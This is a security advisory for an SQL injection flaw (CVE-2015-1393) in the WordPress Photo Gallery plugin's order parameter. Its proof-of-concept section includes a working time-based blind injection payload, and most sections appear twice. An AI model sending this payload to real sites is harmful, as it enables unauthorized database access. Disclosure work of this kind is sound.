WordPress Photo Gallery Plugin 'asc_or_desc' Parameter SQL Injection Vulnerability
BID:72364
Info
WordPress Photo Gallery Plugin 'asc_or_desc' Parameter SQL Injection Vulnerability
| Bugtraq ID: | 72364 |
| Class: | Input Validation Error |
| CVE: |
CVE-2015-1393 |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 29 2015 12:00AM |
| Updated: | Jan 29 2015 12:00AM |
| Credit: | Sven Schleier |
| Vulnerable: | |
| Not Vulnerable: | |
Discussion
WordPress Photo Gallery Plugin 'asc_or_desc' Parameter SQL Injection Vulnerability
The Photo Gallery plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Photo Gallery 1.2.8 is vulnerable; other versions may also be affected.
The Photo Gallery plugin for WordPress is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query.
An attacker can exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Photo Gallery 1.2.8 is vulnerable; other versions may also be affected.
Exploit / POC
WordPress Photo Gallery Plugin 'asc_or_desc' Parameter SQL Injection Vulnerability
An attacker can exploit this issue using a browser.
The following example input is available:
search_value=&page_number=1&search_or_not=&task=add&current_id=&ids_string=&asc_or_desc=asc&order_by=asc%2c(select%20*%20from%20(select(sleep(10)))a)
An attacker can exploit this issue using a browser.
The following example input is available:
search_value=&page_number=1&search_or_not=&task=add&current_id=&ids_string=&asc_or_desc=asc&order_by=asc%2c(select%20*%20from%20(select(sleep(10)))a)
Solution / Fix
WordPress Photo Gallery Plugin 'asc_or_desc' Parameter SQL Injection Vulnerability
Solution:
Updates are available. Please see the references or vendor advisory for more information.
Solution:
Updates are available. Please see the references or vendor advisory for more information.
References
WordPress Photo Gallery Plugin 'asc_or_desc' Parameter SQL Injection Vulnerability
References:
References: